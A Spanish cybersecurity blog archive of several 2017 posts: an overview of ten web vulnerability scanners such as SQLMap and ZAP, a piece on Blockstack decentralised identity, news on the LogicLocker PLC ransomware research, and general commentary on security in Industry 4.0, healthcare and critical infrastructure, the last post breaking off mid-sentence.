dedicar mi primer post en este blog a dar una lista de 10 herramientas que creo que os pueden resultar útiles a la hora de buscar vulnerabilidades en aplicaciones web. Si atendemos a las noticias cada vez es más común encontrar que ha habido una intrusión en importantes sitios web con su correspondiente fuga de información. Hoy en día los "hackers" son cada vez más activos y siempre están buscando vulnerabilidades para poder obtener datos sensibles. Para evitar esto podemos utilizar las h Voy a dedicar mi primer post en este blog a dar una lista de 10 herramientas que creo que os pueden resultar útiles a la hora de buscar vulnerabilidades en aplicaciones web. Si atendemos a las noticias cada vez es más común encontrar que ha habido una intrusión en importantes sitios web con su correspondiente fuga de información. Hoy en día los "hackers" son cada vez más activos y siempre están buscando vulnerabilidades para poder obtener datos sensibles. Para evitar esto podemos utilizar las herramientas que mencionaré a continuación para encontrar estas vulnerabilidades antes que un usuario malicioso. Antes de listar estos escáneres, decir que estas herramientas son un software que realiza pruebas de caja negra sobre la aplicación web buscando vulnerabilidades de seguridad, claramente no tienen acceso al código fuente, sólo realizan pruebas funcionales. La lista que doy a continuación es aleatoria, no es un ranking ## Grendel-Scan Es una herramienta desarrollada en Java disponible para Windows, Linux y Mac OS. Podéis descargarla aquí. ## Vega Esta herramienta está escrita en Java y ofrece un entorno basado en GUI. Está disponible para Mac, Linux y Windows. Puede utilizarse para encontrar SQL injection, header injection, directory listing, shell injection, cross site scripting, file inclusion y otras vulnerabilidades de aplicaciones web. Esta herramienta también se puede ampliar usando una potente API escrita en JavaScript. Podéis ver la Documentación y descargarla aquí ## Wapiti Realiza pruebas de caja negra al escanear páginas web e inyectar datos. Intenta inyectar cargas y ver si un script es vulnerable. Es compatible con los ataques GET y POSTHTTP y detecta múltiples vulnerabilidades. Puede detectar las siguientes vulnerabilidades: - File Disclosure - File inclusion - Cross Site Scripting (XSS) - Command execution detection - CRLF Injection - SEL Injection and Xpath Injection - Weak .htaccess configuration - Backup files disclosure Wapiti es una aplicación de línea de comandos. Por lo tanto, puede no ser fácil para los principiantes. Pero para los expertos, funcionará muy bien. Para utilizar esta herramienta se necesitan aprender muchos comandos, o tener la documentación siempre a mano. Tenéis todo lo referente a Wapiti, aquí ## Skipfish Skipfish rastrea el sitio web y luego revisa cada página buscando varias amenazas de seguridad para después preparar un informe final. Esta herramienta esta escrita en C y está muy optimizada para el manejo HTTP y muy pocos recursos de CPU. En la descripción dice que puede manejar fácilmente 2000 solicitudes por segundo sin agregar una carga en la CPU. Utiliza un enfoque heurístico al rastrear y probar páginas web. Esta herramienta también pretende ofrecer alta calidad y menos falsos positivos. Está disponible para Linux, FreeBSD, MacOS X y Windows. Tenéis la descargar Skipfish y su código , aquí ## SQLMap SQLMap es una herramienta popular de test de penetración. Automatiza el proceso de encontrar y explotar la vulnerabilidad de SQL injection en la base de datos de un sitio web. Tiene un poderoso motor de detección y muchas características útiles. Soporta un alto rango de servidores de bases de datos incluyendo MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase y SAP MaxDB. Ofrece soporte completo a 6 tipos de técnicas de SQL injection: time-based blind, boolean-based blind, error-based, UNION query, stacked queries y out-of-band. Tenéis disponible el código fuente de SQLMap y su descarga en Github ## Graber Graber puede detectar muchas vulnerabilidades de seguridad en aplicaciones web. Realiza exploraciones e indica dónde está la vulnerabilidad. Puede detectar las siguientes vulnerabilidades: - Cross site scripting - SQL injection - Ajax testing - File inclusion - JS source code analyzer - Backup file check No es muy rápido en comparación con otros escáneres, pero es simple y portátil. Yo lo usaría sólo para probar aplicaciones web pequeñas, ya que toma demasiado tiempo explorar aplicaciones grandes. Esta herramienta no ofrece ningún interfaz GUI, tampoco puede crear ningún informe PDF. Fue diseñada para ser simple y para uso personal, no la recomiendo para uso profesional. Esta desarrollada en Python y existe una versión ejecutable. El código fuente está disponible, por lo que puedes modificarlo de acuerdo a tus necesidades. El script principal es grabber.py, que una vez ejecutado llama a otros módulos como sql.py, xss.py u otros. Graber esta disponible para su descarga y el código fuente en Github ## Ratproxy Ratproxy es también una herramienta de auditoria para aplicaciones web que puede utilizarse para encontrar vulnerabilidades de seguridad. Es compatible con entornos Linux, FreeBSD, Mac OS y Windows (Cygwin). Está diseñada para superar los problemas que los usuarios usualmente enfrentan al usar otras herramientas de proxy para auditorías de seguridad. Es capaz de distinguir entre hojas de estilo CSS y códigos JavaScript. También soporta ataques SSL man-in-the-middle, lo que significa que también puedes ver los datos que pasan a través de SSL. Tenéis disponible toda la documentación y su descarga en este enlace ## Arachni Esta herramienta ha sido diseñada para proporcionar un entorno para realizar test de penetración. Esta herramienta puede detectar varias vulnerabilidades de seguridad en aplicaciones web como SQL Injection, XSS, Local File inclusion, remote file inclusion, unvalidated redirect, etc. En este enlace tenéis la descarga de Arachni ## Wfuzz Esta herramienta se puede usar para hacer fuerza bruta de parámetros GET y POST para realizar comprobaciones de varios tipos de inyecciones como SWL, XSS, LDAP. También realiza cookie fuzzing, multi-threading, SOCK, Proxy, Authentication, parameters brute forcing y multiple proxy.No ofrece un interfaz GUI por lo que hay que trabajar con comandos. Wfuzz esta disponible para la descarga con documentación aquí ## Zed Attack Proxy Zed Attack Proxy conocida ZAP, desarrollada por AWASP, está disponible para Windows, Unix / Linux y Mac OS. Personalmente, me gusta esta herramienta. Puede utilizarse para encontrar una amplia gama de vulnerabilidades en aplicaciones web. La herramienta es muy simple y fácil de usar. Incluso si eres nuevo en los test de penetración, puedes utilizar fácilmente esta herramienta para comenzar a aprender. Estas son las principales funcionalidades de ZAP: - Intercepting Proxy - Automatic Scanner - Traditional but powerful spiders - Fuzzer - Web Socket Support - Plug-n-hack support - Authentication support - REST based API - Dynamic SSL certificates - Smartcard and Client Digital Certificates support Puedes utilizar esta herramienta como un escáner introduciendo la URL para realizar el escaneo, o puedes la utilizar como proxy de interceptación para realizar manualmente pruebas en páginas específicas. Y por ultimo podemos descarga Zed Attack Proxy, en este enlace > Bueno, espero que os haya gustado el post y os sirva alguna de estas herramientas. ¡¡Saludos a todos!! --- # La constitución digital esta aquí , y la creará el propio usuario URL: https://ciberseguridad.blog/la-constitucion-digital-esta-aqui-y-la-creara-el-propio-usuario/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-02-16 Actualizado: 2026-10-04 Tema: Gestion de Identidades y Accesos > Blockstack es un movimiento para construir la web descentralizada, un movimiento de hackers, diseñadores y empresarios de todo el mundo profundamente comprometidos con el futuro de Internet como un bastión de innovación, libertad e inclusión económica. Blockstack consiste en empujar la energía a los bordes con aplicaciones descentralizadas y permitir a los usuarios tener el control de sus datos, identidades y software. Si estás interesado en una lectura técnica en profundidad, aquí está un > Blockstack es un movimiento para construir la web descentralizada, un movimiento de hackers, diseñadores y empresarios de todo el mundo profundamente comprometidos con el futuro de Internet como un bastión de innovación, libertad e inclusión económica. Blockstack consiste en empujar la energía a los bordes con aplicaciones descentralizadas y permitir a los usuarios tener el control de sus datos, identidades y software. Si estás interesado en una lectura técnica en profundidad, aquí está un PDF publicado para la Conferencia Técnica Anual 2016 de USENIX (USENIX ATC '16) titulado: Blockstack: Un Sistema de Nomenclatura y Almacenamiento Global Asegurado por Blockchains. Si usted puede llegar al final de ese documento, bien vale la pena su tiempo! Los autores de este documento son: Muneeb Ali y Jude Nelson, Universidad de Princeton y Blockstack Labs; Ryan Shea, Laboratorios Blockstack; Michael J. Freedman, Universidad de Princeton. Así funciona Blockstack : > La descentralización conduce a la innovación, la libertad y la inclusión económica. La centralización significa más experimentación y menos innovación. Significa menos puntos de control y mayor libertad para los participantes de la red. Esto significa que más desarrolladores pueden traer productos al mercado y competir con los gigantes - Blockstack Blockstack 101 es el nombre de software libre y de código abierto construido en la capa superior del movimiento Bitcoin Blockchain, desarrollado por un grupo de investigadores, desarrolladores e ingenieros, para que todos nosotros lo usemos como deseamos. ¿Por qué la cadena Bitcoin frente a la construcción de una nueva cadena de bloques o la adopción de uno de los más de 500 métodos que ya están disponible? En el PDF mencionado anteriormente de la Conferencia Técnica Anual de USENIX en 2016 (USENIX ATC '16), se hace un trabajo impecable en detallar cómo estos "creadores" decidieron, después de ensayo y error, cual era la opción más fiable y estructuralmente correcta para construir encima de una cadena de bloque. Una cadena de bloques no necesariamente equivale a otra cadena de bloques, hay muchos factores que determinan la confiabilidad, la descentralización auténtica y muchos mas terminos. > Internet se creó como una frontera abierta, sin permiso, igualitaria. Fue un bastión de libertad e innovación. Pero con el tiempo, el poder en Internet comenzó a consolidarse y unas cuantas grandes empresas ganaron control. Esto no es como se suponía que iba a ser. - Blockstack [Vídeo](https://www.youtube.com/watch?v=qtOIh93Hvuw) > La construcción de grandes productos no debe requerir la administración de servidores, bases de datos y sistemas de identificación. El software de construcción debe ser simple. Con el modelo de aplicación descentralizada, los desarrolladores no tienen que administrar servidores o bases de datos ni crear sistemas de administración de usuarios. El software se ejecuta en los dispositivos del usuario y los clientes intercambian información "- Blockstack En mayo de 2016, Microsoft anunció su colaboración con Blockstack Labs y ConsenSys junto con otros colaboradores en un esfuerzo por producir un sistema de gestión de identidades basado en blockchains mediante código abierto. Sin embargo, más que un sistema de identidad, permitiría a los usuarios, productos, empresas, etc, operar a través de múltiples Blockchains mientras que también utiliza servicios de almacenamiento basados en la nube. Un ejemplo de servicio de gestión de identidad basado en bloques disponible es Onename. Onename se construye usando bloques bitcoins de Blockstack. ## ¿Qué se puede hacer con Onename? El concepto detrás de cualquier sistema de identidad basado en bloques es la descentralización de contenidos, un lugar donde los usuarios poseen sus datos, los usuarios controlan sus datos y las aplicaciones se ejecutan en sus dispositivos. A diferencia de los sistemas de identidad basados en blockchain, la mayoría de redes sociales populares entregan datos confidenciales de clientes / usuarios con el fin de lograr campañas publicitarias dirigidas. La constitución digital ya ha comenzado. El usuario será quien decida que comparte con quien y como. Un nuevo movimiento a comenzado, y estoy seguro, revolucionará la forma en la que vemos internet.Blockstack es un movimiento para construir la web descentralizada, un movimiento de hackers, diseñadores y empresarios de todo el mundo profundamente comprometidos con el futuro de Internet como un bastión de innovación, libertad e inclusión económica. Blockstack consiste en empujar la energía a los bordes con aplicaciones descentralizadas y permitir a los usuarios tener el control de sus datos, identidades y software. Si estás interesado en una lectura técnica en profundidad, aquí está un PDF publicado para la Conferencia Técnica Anual 2016 de USENIX (USENIX ATC '16) titulado: Blockstack: Un Sistema de Nomenclatura y Almacenamiento Global Asegurado por Blockchains. Si usted puede llegar al final de ese documento, bien vale la pena su tiempo! Los autores de este documento son: Muneeb Ali y Jude Nelson, Universidad de Princeton y Blockstack Labs; Ryan Shea, Laboratorios Blockstack; Michael J. Freedman, Universidad de Princeton. Así funciona Blockstack : La descentralización conduce a la innovación, la libertad y la inclusión económica. La centralización significa más experimentación y menos innovación. Significa menos puntos de control y mayor libertad para los participantes de la red. Esto significa que más desarrolladores pueden traer productos al mercado y competir con los gigantes - Blockstack Blockstack 101 es el nombre de software libre y de código abierto construido en la capa superior del movimiento Bitcoin Blockchain, desarrollado por un grupo de investigadores, desarrolladores e ingenieros, para que todos nosotros lo usemos como deseamos. ¿Por qué la cadena Bitcoin frente a la construcción de una nueva cadena de bloques o la adopción de uno de los más de 500 métodos que ya están disponible? En el PDF mencionado anteriormente de la Conferencia Técnica Anual de USENIX en 2016 (USENIX ATC '16), se hace un trabajo impecable en detallar cómo estos "creadores" decidieron, después de ensayo y error, cual era la opción más fiable y estructuralmente correcta para construir encima de una cadena de bloque. Una cadena de bloques no necesariamente equivale a otra cadena de bloques, hay muchos factores que determinan la confiabilidad, la descentralización auténtica y muchos mas terminos. Internet se creó como una frontera abierta, sin permiso, igualitaria. Fue un bastión de libertad e innovación. Pero con el tiempo, el poder en Internet comenzó a consolidarse y unas cuantas grandes empresas ganaron control. Esto no es como se suponía que iba a ser. - Blockstack La construcción de grandes productos no debe requerir la administración de servidores, bases de datos y sistemas de identificación. El software de construcción debe ser simple. Con el modelo de aplicación descentralizada, los desarrolladores no tienen que administrar servidores o bases de datos ni crear sistemas de administración de usuarios. El software se ejecuta en los dispositivos del usuario y los clientes intercambian información "- Blockstack En mayo de 2016, Microsoft anunció su colaboración con Blockstack Labs y ConsenSys junto con otros colaboradores en un esfuerzo por producir un sistema de gestión de identidades basado en blockchains mediante código abierto. Sin embargo, más que un sistema de identidad, permitiría a los usuarios, productos, empresas, etc, operar a través de múltiples Blockchains mientras que también utiliza servicios de almacenamiento basados en la nube. Un ejemplo de servicio de gestión de identidad basado en bloques disponible es Onename. Onename se construye usando bloques bitcoins de Blockstack. ## ¿Qué se puede hacer con Onename? El concepto detrás de cualquier sistema de identidad basado en bloques es la descentralización de contenidos, un lugar donde los usuarios poseen sus datos, los usuarios controlan sus datos y las aplicaciones se ejecutan en sus dispositivos. A diferencia de los sistemas de identidad basados en blockchain, la mayoría de redes sociales populares entregan datos confidenciales de clientes / usuarios con el fin de lograr campañas publicitarias dirigidas. La constitución digital ya ha comenzado. El usuario será quien decida que comparte con quien y como. Un nuevo movimiento a comenzado, y estoy seguro, revolucionará la forma en la que vemos internet. --- # Ransomware en infraestructuras criticas URL: https://ciberseguridad.blog/ransomware-en-infraestructuras-criticas/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-02-14 Actualizado: 2026-09-29 Tema: Vulnerabilidades y Ataques Informaticos > Por ahora, se trata de un experimento controlado, pero los autores detrás del primer ransomware de sistemas de control industrial afirman que es cuestión de tiempo que los ciberdelincuentes empiecen a crearlos. Imaginemos que un grupo de hackers fuese capaz de infectar los diminutos ordenadores que controlan las infraestructuras críticas, como plantas de energía o instalaciones de tratamiento de agua, sistemas conocidos como Controladores Lógicos Programables o PLCs [https://es.wikipedia.org/wi Por ahora, se trata de un experimento controlado, pero los autores detrás del primer ransomware de sistemas de control industrial afirman que es cuestión de tiempo que los ciberdelincuentes empiecen a crearlos. Imaginemos que un grupo de hackers fuese capaz de infectar los diminutos ordenadores que controlan las infraestructuras críticas, como plantas de energía o instalaciones de tratamiento de agua, sistemas conocidos como Controladores Lógicos Programables o PLCs, pidiendo un rescate o pudiendo causar un apagón generalizado en una ciudad. Si bien es cierto que es un escenario caótico, afortunadamente no ha ocurrido "todavía". Pero un grupo de investigadores del Instituto Tecnologico de Georgia advierte de la inminencia de dichos ataques y nos demuestra que han desarrollado y probado en su laboratorio una prueba de concepto de ransomware que ataca específicamente a tres tipos de PLC. Los creadores lo han bautizado como LogicLocker, y detallan cómo funcionaría aquí . En el escenario que describen, un grupo de ciberdelincuentes apuntaría a los PLCs que están expuestos en línea y los infectarían con malware personalizado diseñado para reprogramar el pequeño ordenador con una nueva contraseña, bloqueando a los propietarios legítimos de cualquier tipo de acceso. Posteriormente y como es habitual en los Ramsonware, los hackers alertarían al propietario del activo, pidiendo un rescate. Si los propietarios pagan, obtienen su PLC de vuelta. Si no lo hacen, pagarán un precio diferente: tener una planta defectuosa, o peor, daños físico en sus sistemas o incluso peor aún, a personas físicas. > "Es muy posible, y creo que sucederá pronto desafortunadamente." - Raheem Beyah (Uno de los autores) Como indica Raheem, es inevitable que los criminales apunten pronto a la infraestructura crítica. Si lo hacen, los objetivos no serán difícil de conseguir. Si buscamos en Internet dos de los modelos de PLCs usados en el estudio, encontramos más de 1.500 dispositivos expuestos y vulnerables en línea.( MicroLogix 1400 , Schneider Modicon M221 , Siemens S7-1200 ) El fin de la investigación, según han indicado los autores, es concienciar de la importancia de la seguridad en las infraestructuras criticas. Un llamamiento alarmante por las nefastas consecuencias en caso de no acometerse. --- # Ciberseguridad en la Industria 4.0 URL: https://ciberseguridad.blog/ciberseguridad-en-la-industria-4-0/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-01-16 Actualizado: 2026-09-29 Tema: Vulnerabilidades y Ataques Informaticos > Lo he dicho múltiples veces y continuaré diciendolo, la forma en que la tecnología ha invadido nuestras vidas es abrumadora. Llevamos con nosotros, nuestros propios ordenadores móviles en nuestros bolsillos. Nuestros televisores están digitalizados y conectados a medios en streaming. Incluso nuestros propios cuerpos están comenzando a tener una capa digital a través del uso de dispositivos como el AppleWatch. Y por ellos, nuestros sectores industriales no son una excepción a todo este movimiento Lo he dicho múltiples veces y continuaré diciendolo, la forma en que la tecnología ha invadido nuestras vidas es abrumadora. Llevamos con nosotros, nuestros propios ordenadores móviles en nuestros bolsillos. Nuestros televisores están digitalizados y conectados a medios en streaming. Incluso nuestros propios cuerpos están comenzando a tener una capa digital a través del uso de dispositivos como el AppleWatch. Y por ellos, nuestros sectores industriales no son una excepción a todo este movimiento; La digitalización de la industria, y las empresas de servicios públicos está avanzando a pasos agigantados. Iniciativas como el 7º Marco de la UE (ahora, parte del Horizonte 2020) alienta a los fabricantes de PYMES a utilizar las TIC en sus procesos de negocio. Proyectos como Industrie 4.0 del gobierno alemán para impulsar el ritmo de la Industria 4.0 o la feria Hannover Messe que muestra e incentiva la digitalización de la industria ( siendo la feria industrial más grande del mundo) están llevando a la industria a un nuevo movimiento conocido como Industria 4.0. Aún recuerdo cuando estudiaba en el colegio la revolución Industrial, y me saca una sonrisa el vivir todo esto de lleno, vivir el cambio y ser participe de ello. Hay una serie de puntos que impulsan la industria en esta nueva era. Posiblemente el principal y punto mas importante sea una mejor y mayor conectividad ya que las comunicaciones por Internet se han vuelto más rápidas y robustas. Una mayor globalización impulsada por esta conectividad, es un factor contribuyente a la importancia de la conectividad altamente distribuida en la industria. La capacidad de lidiar con el aumento masivo de los datos generados a través de esta hiperconectividad, añadiendo analíticas y bussines Intelligence para dar un valor añadido. Pero el que realmente ha añadido y dado más progresión, ha sido el Internet de las cosas (IoT), tomando esta conectividad y dando alas a la digitalización de la industria y la fabricación. ## ¿Que podemos esperar de la Industria 4.0 o Fabricas Inteligentes? Existen una serie de caracteristicas o terminos clave para referirnos a la Industria 4.0 y para ello, podemos hacer referencia a los términos descritos en el artículo 'Chancen und Risiken 4.0' como: > ... automatización, autonomía, flexibilidad e individualización ... El núcleo de la industria 4.0 es la Fábrica Inteligente, una fábrica inteligente. La fábrica inteligente es operada por un sistema cibernético-físico (que consiste en componentes físicos, recibiendo entradas virtuales y fuente de productos físicos) e innovadores robots industriales y, mientras tanto, está conectado a su entorno " La introducción de la "Fábrica Inteligente" trae consigo nuevos desafíos en seguridad. La Industria 4.0 , por su propia naturaleza necesita estar interconectada a muchos otros sistemas, siendo parte de un ecosistema mucho más grande. Y como cualquier ecosistema extendido, es complejo y con dicha complejidad, viene asociada un aumento de posibles puntos de fallo o vulnerables. El concepto "Smart" no es sólo crear más oportunidades y construir comunicaciones más rápidas y valiosas, sino también hacer que su infraestructura sea responsable de ciertas ganancias , asi como de tener y mantener una estructura interna robusta. En un mundo en el que las preocupaciones por la ciberseguridad y la privacidad están en pleno apogeo, necesitamos asegurar que la industria 4.0 abarque estos temas como parte del todo. Y como ya estamos ciertamente trabajados en la seguridad en otros ámbitos, tenemos una gran oportunidad de empezar a hacer las cosas bien desde un principio. ## Ciberseguridad en la Industria 4.0 Los participes de la Industria 4.0 , sufren muchas de las mismas amenazas de seguridad que otras organizaciones. Se tienen que contrarrestar las mismas amenazas externas e internas que toda empresa, de todos los tamaños. Se debe lidiar con un panorama en ciberseguridad muy complicado y sofisticado con el que tratamos día a día. Lo hacen, sin embargo, ademas de estas, tienen algunas amenazas que aunque tal vez no sean en exclusiva de la Industria 4.0, son un problema importante para las mismas. Como amenazas de seguridad con las que deben lidiar los jugadores en la Industria 4.0 en las que deben enfocarse y tratar de mitigar, podemos encontrarnos: ### Amenazas persistentes avanzadas y ciberespionaje El uso de mecanismos de amenazas a la seguridad conocidos como amenazas persistentes avanzadas (APT) no es nada nuevo en el sector. Los APT se han utilizado durante muchos años como una forma clandestina de usar malware, durante un largo período de tiempo, para extraer datos confidenciales. Ahora estamos viendo nuevos desarrollos, a veces financiados por ciertos estados, ciber grupos delictivos que utilizan APT para realizar ciberespionaje. Uno de estos grupos es el grupo Black Vine que se centra en industrias como la aeroespacial y las empresas de servicios públicos. Muchos de estos tipos de grupos existen han recibido una reciente serie de acusaciones, la industria siderúrgica estadounidense ha acusado al gobierno chino de robar propiedad intelectual a través de una campaña de hacking sostenida, lo que probablemente afectará a las importaciones chinas. Grupos como Black Vine a menudo usan malware de tipo APT que explora vulnerabilidades de día cero para robar lentamente, a menudo durante meses, datos confidenciales de la compañía. La Industria 4.0 es más vulnerable al ciberespionaje debido a los procesos de negocio inteligentes y conectados que lo subyacen, por lo que es probable que veamos este tipo de amenazas cibernéticas aumentar progresivamente. ### Ciberterrorismo Posiblemente uno de los tipos más temidos de amenaza cibernética al que nos enfrentamos hoy en día, es el ciberterrorismo; Donde el cibercriminal se transforma en un terrorista digital. La definición de ciberterrorismo cubre una multitud de terminos, desde la exposición de los datos hasta el daño físico. Pero en general, se puede ver que tiene motivaciones políticas , como hemos visto en un articulo anterior sobre la seguridad en infraestructuras críticas. Se sabe que los grupos terroristas actuales están trabajando activamente en técnicas de ciberterrorismo y grupos como el ISIS tiene un foro dedicado donde intercambian información en ciberseguridad, sobre cómo crear artefactos de destrucción en componentes de infraestructura crítica tales como servicios públicos. Un análisis de la amenaza del ciberterrorismo por parte de ISIS, "Riesgos de Ciberterrorismo por parte del ISIS" encontró que uno de los determinantes clave era el hecho de que la industria moderna, también conocida como Industria 4.0, está "conectada" a internet y como tal vulnerable a recibir ataques de seguridad. ### Ecosistema Ampliado Una de las características clave de la Industria 4.0 es la capacidad de interconexión entre entornos, lo cual tiene el potencial de hacer que la cadena de suministro sea más eficiente. Sin embargo, los problemas de seguridad de la cadena de suministro son conocidos y explotados con efectividad por los ciberdelincuentes. Muchas de las brechas de seguridad más grandes han comenzado con un proveedor, a menudo robando credenciales privilegiadas, dando lugar a la exposición masiva de datos. La Industria 4.0 le da al ciberatacante más oportunidades de recavar información en la parte superior de la cadena de suministro, llegando posteriormente a la fábrica Smart a través de sus actores dependientes ajenos. Sólo mediante la utilización de modernas medidas de control de ciberseguridad , como la autenticación adaptativa y el análisis del comportamiento pueden ser la esperanza para detener el flujo de la cadena de suministro usada por los ciberdelincuentes en la industria 4.0. ### Desafíos del Internet de las Cosas El IOT es un desafío. Crea una multitud de puntos de entrada que pueden ser potencialmente explotados por los atacantes. El IoT en sí mismo tiene multitud de problemas con la seguridad en niveles mas bajos, que pueden llegar a ser heredados para apoyar los procesos de la industria 4.0. El gurú de seguridad, Bruce Schneier, en un post de su hiperconocido blog, sobre el IoT y los dispositivos altamente conectados, declaró que él creía que estamos en una situación en la que tenemos > ... que reacondicionar la seguridad después del hecho ". El no tener una capa de seguridad incorporada en el Internet de las cosas como un requisito previo, ha dejado al sistema entero abierto a serias vulnerabilidades como ya hemos podido comprobar. La dependencia de la Industria 4.0 significa que las empresas han heredado estas vulnerabilidades a menos que se tomasen precauciones especiales, como medidas de autenticación más adaptables, para mitigar las mismas. ### La Fábrica Inteligente No podemos volver el reloj hacia atrás. Así como la revolución industrial de los siglos XVIII y XIX vio cambios industriales y sociales masivos y profundos, la Industria 4.0 traerá igualmente cambios importantes en cómo trabajamos y cómo nuestras industrias colaboran e innovan. La gente ya esta empezando a templar con los recortes en trabajo, pero para mi, esto es algo realmente bueno. Las industrias hiperconectadas pueden ofrecer mejoras en todas nuestras industrias. Los grandes datos generados a través del uso del IoT pueden darnos ideas sobre cómo funcionan las cosas y pueden mejorar procesos en los que normalmente nunca hemos hecho incapie. Los ciberdelincuentes y ciberterroristas están trabajando activamente para asegurar que obtienen su trocito de la tarta de esta industria 4.0. Las técnicas probadas una y otra vez, como la ingeniería social, son mucho más potentes cuando estás "siempre conectado". Por eso, solo podemos hacer frente a los ataques de la industria smart , con seguridad smart , pero todo esto nos da para muchos post más que iremos tratando. --- # Un año clave para la ciberseguridad en el sector salud. URL: https://ciberseguridad.blog/un-ano-clave-para-la-ciberseguridad-en-el-sector-salud/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-01-11 Actualizado: 2026-09-29 Tema: Vulnerabilidades y Ataques Informaticos > La necesidad de empezar a mejorar la salud no sólo de los pacientes, sino de las poblaciones enteras, cada vez está tomando un interes mas relevante. Vimos unos años atras, como los smartwhatch empezaban a involucrase en nuestras vidas , como las zapatillas se conectaban con nuestros teléfonos, como nuestra botella inteligente nos indica cuando beber agua ... todo asociado a un único fin como he indicado, empezar a mejorar la salud de la población. Todo ello asociado a un tratamiento especial de La necesidad de empezar a mejorar la salud no sólo de los pacientes, sino de las poblaciones enteras, cada vez está tomando un interes mas relevante. Vimos unos años atras, como los smartwhatch empezaban a involucrase en nuestras vidas , como las zapatillas se conectaban con nuestros teléfonos, como nuestra botella inteligente nos indica cuando beber agua ... todo asociado a un único fin como he indicado, empezar a mejorar la salud de la población. Todo ello asociado a un tratamiento especial de estos datos y una mas que necesaria renovación de las infraestructuras del sector salud, para hacer frente a dicho movimiento. Pero este interes, ha abierto otra serie de puertas , que a mi entender, tienen una importancia muy relevante dentro del mundo de la seguridad, y que sería la seguridad de los datos de salud o datos clínicos, información tan importante o más que una cuenta bancaría o su numero de tarjeta asociado. Las entidades sanitarias están en plena transformación en tecnologías de la información. Hace unos días he hablado sobre las tendencias de en ciberseguridad de este año , y si bien , esta no se consideraría una tendencia, 2017 creo que será el año de transformación y renovación de las infraestructuras tecnológicas en el ámbito sanitario y la securización de las mismas para estos datos sensibles. ## Análisis del riesgo de seguridad en el sector salud De acuerdo con HHS , el proceso de análisis de riesgo identifica amenazas y vulnerabilidades en sistemas que contienen información electrónica de salud protegida (ePHI). El Instituto Nacional de Ciencia y Tecnología (NIST) y su Publicación Especial (SP) 800-30 identifica los diferentes tipos de amenazas : - Humana : Incidentes permitidos o causados ​​por humanos. Pueden ser involuntarios (entrada erróneas de datos) o deliberadas (software malintencionado, ataques basados ​​en red, acceso no autorizado, etc.). - Naturales : Desastres que pueden afectar sistemas que contienen datos o redes, incluyendo inundaciones, terremotos, tormentas eléctricas, etc. - Ambientales : Fallo de energía continuado, contaminación, productos químicos o fuga de líquidos. Por ello, y según este mismo criterio, un análisis de riesgo incluye: - Inventario de todos los sistemas y aplicaciones utilizados para acceder y almacenar datos clasificación de sistemas y aplicaciones por nivel de riesgo - Una evaluación de las medidas de seguridad actuales, la probabilidad y el impacto potencial de que ocurra una amenazas - Consecuencias anticipadas de datos perdidos o dañados y sistemas de datos dañados Por si estáis interesados, esta guía: HIPAA Security Series: Fundamentos de Análisis de Riesgos y Gestión de Riesgos , proporciona una orientación más detallada para el análisis de riesgos y planes de gestión de riesgos tanto tanto para organizaciones sanitarias como sus asociadas que usen dichos datos. ## Gestión del riesgo y la ciberseguridad en el sector salud La gestión de riesgos es la implementación real de medidas de seguridad para reducir el riesgo de una organización de perder o comprometer los datos de pacientes, así como cumplir con los estándares generales de seguridad, según el HHS. El Instituto Nacional de Estándares y Tecnología (NIST), indica que el marco de una gestión de riesgos y seguridad debe incluir: - Categorización de los sistemas de información - Selección, implementación y evaluación de controles de seguridad - Sistemas de información de autorización - Supervisión de controles de seguridad Una manera de protegerse contra las vulnerabilidades conocidas de sistemas y software es mantener actualizadas las aplicaciones, seleccionando una solución de seguridad que detecte dispositivos obsoletos o posiblemente comprometidos, que traten en sus sistemas con datos de pacientes. Esto garantizaría que sólo los dispositivos confiables, correctamente parchados y actualizados, accediesen a información confidencial. Otro control esencial de seguridad está relacionado con los controles de acceso y la autenticación con sistemas que contienen datos de pacientes. La implementación de la autenticación de doble factor en toda la organización , puede garantizar que sólo los usuarios legítimos y de confianza puedan acceder a las aplicaciones y los datos de los pacientes mediante la verificación de su identidad mediante un segundo factor. En relación con la autenticación robusta, la misma, podría haber ayudado a prevenir las brechas de seguridad debido a amenazas de phishing, que pudieron haber sido la causa raíz de una violación de datos en 2015 en Anthem , siendo el segundo mayor asegurador de salud en los Estados Unidos en numero de pacientes. ## La importancia de la seguridad en datos clínicos Los ataques de ciberseguridad dirigidos al sector sanitario ha aumentado un 100% desde 2010. Del mismo modo, los costes de violación o vulneración de estos datos han aumentado un 15%, y todo ello aumentando. > La necesidad de un nuevo enfoque para asegurar los datos de los pacientes o datos de salud, es mayor que nunca. Pero la realidad se reduce a un increible confusión sobre la legislación y normativa en el sector sanitario. Los requisitos de seguridad obligatorios como pueden ser la HIPAA, los sistemas electrónicos de registro de salud (EHR) y más, pueden llegar a complicar la búsqueda de soluciones. Por ello, debemos ser conscientes que estamos compartiendo nuestra salud y plantearnos, como de seguros están estos datos. Personalmente tengo un AppleWatch y yo pienso,¿Estarán seguros mis datos? ¿Con quien se comparten?, datos tales como: Frecuencia cardiaca , Distancia recorrida ... y este mismo planteamiento, trasladarlo a nuestro hospital, a nuestro historial clínico. > ~~ El dia de mañana~~ Hoy mismo, se robaran datos clínicos y cientos de empresas y sectores, estarán deseando comprarlos. --- # Ciberataques a infraestructuras críticas URL: https://ciberseguridad.blog/ciberataques-a-infraestructuras-criticas/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-01-06 Actualizado: 2026-09-29 Tema: Vulnerabilidades y Ataques Informaticos > Los ataques a las infraestructuras críticas, están en el punto de mira. Ataques que pueden dejar a una sociedad sin luz o comunicaciones. ## Ataques a infraestructuras criticas No llegamos a entender realmente, hasta que punto las máquinas controlan nuestro mundo. Desde semáforos hasta centrales eléctricas, tiene sistemas automatizados, claro está , por razones justificadas. Estos programas y automatización permite un nivel de eficiencia y efectividad que los empleados humanos simplemente no pueden proporcionar. (Es posible que alguno me saque los ojos por este comentario, pero a mi entender, hay que ser relistas) Pero esta super eficiencia y efectividad, tambien tiene un coste. No existe sistema diseñado que sean completamente impenetrable/vulnerables. Instalaciones como las centrales eléctricas son un foco de ataques y hackeos importante, teniendo una gran problemática, ya que si recayesen ataques sobre estas infraestructuras criticas, las consecuencias podrían ser desastrosas. ## ¿Por qué una infraestructura crítica? Antes de entrar en detalles de quién se ha visto afectado por este 